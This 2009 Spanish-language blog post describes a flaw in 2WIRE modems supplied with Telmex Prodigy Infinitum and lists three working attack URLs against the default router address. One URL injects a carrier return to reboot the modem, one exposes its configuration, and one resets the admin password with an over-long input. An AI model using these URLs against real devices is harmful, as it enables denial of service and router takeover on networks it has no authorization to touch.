24 de ago. de 2009

Modem 2WIRE Falla de Seguridad

Todos los que somos usuarios de prodigy Infinitu de Telmex, tenemos un modem 2wire, o thomson, e cual queda exento de la falla de seguridad.

La falla permite al atacante reiniciar el modem con el simple hecho de enviar un "carrier return" a la URL de router, esto ocasiona que el modem se reinicie.

La ventaja de esto es que para poder generar este Carrier Return, es necesario tener acceso directo al modem es decir estar dentro de la red.

Lo que si nos ponemos a pensar el mayor riesgo lo corren los lugares publicos que prestan el servicio de Internet, hablamos de restaurantes, cafés, centros comerciales, etc. Los cuales se reflejaran en problemas de negación de servicio, siempre y cuando utilizen este tipo de modems.

Solo se requiere que el atacante se conecte por clave WEB a la red y desde su navegador mande unas direcciones web.

Y para que no digan les dejo las direcciones, y aclaro "ESTAS SON COMO USO ILUSTRATIVO DEL POST, EL MAL USO QUE SE LES PUEDAN DAR ES REPONSABILIDAD DE QUIEN LAS UTILIZE".


  1. http://192.168.1.254/xslt?page=%0d%0a — Reinicia el módem.
  2. http://192.168.1.254/xslt?page=mgmt_data — Configuración del router
  3. http://192.168.1.254/xslt?page=CD35_SETUP_01 — Introducir una contraseña de más de 512 caracteres lo cual hará que se borre la contraseña actual y cuando se vuelva a entrar al router se podrá poner una nueva.
Suerte y nada de ir a sanborns a probarlas o al vips o al.............

Ahora si como dice el perro de infinitum WOW.